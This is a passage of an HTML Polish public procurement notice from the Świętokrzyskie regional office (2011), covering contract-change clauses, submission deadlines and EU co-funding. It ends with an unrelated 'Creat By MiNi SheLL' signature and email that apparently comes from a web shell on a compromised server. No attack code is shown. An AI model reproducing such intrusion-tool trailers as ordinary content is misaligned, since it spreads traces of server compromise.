3.W szczególnie uzasadnionych przypadkach termin zakończenia usługi może ulec zmianie, pod warunkiem zaakceptowania tej zmiany przez strony umowy. 
4.	Zamawiający dopuszcza możliwość zmiany ceny umowy po przeprowadzeniu negocjacji i zawarciu stosownego aneksu w przypadku ustawowej zmiany stawki podatku od towarów i usług VAT dla przedmiotu umowy w sytuacji łącznego spełnienia dwóch przesłanek:
a)	gdy istnieje obiektywna konieczność wprowadzenia zmian, np. gdy spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą w rozumieniu art. 3571k.c. 
b)	zmiana wynika z okoliczności, których nie można było przewidzieć w momencie zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sejmik.kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba
Zamawiającego AL.IX Wieków Kielc 3 ;25-516 Kielce budynek C-2 III piętro pokój nr 344.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2011 godzina 12:00, miejsce: Siedziba Zamawiającego AL.IX Wieków Kielc 3 ;25-516 Kielce budynek C-2 I piętro pokój nr 146 kancelaria ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projektu Rozwój systemu kluczowych obszarów funkcjonowania i kompetencji kadr Urzędu Marszałkowskiego Województwa Świętokrzyskiego realizowanego przez Urząd Marszałkowski Województwa Świętokrzyskiego współfinansowanego z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki w ramach Priorytetu V Dobre Rządzenie, Działania 5.2-Wzmocnienie potencjału administracji samorządowej, Poddziałania 5.2.1 Modernizacja zarządzania w administracji samorządowej oraz Budżetu Krajowego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com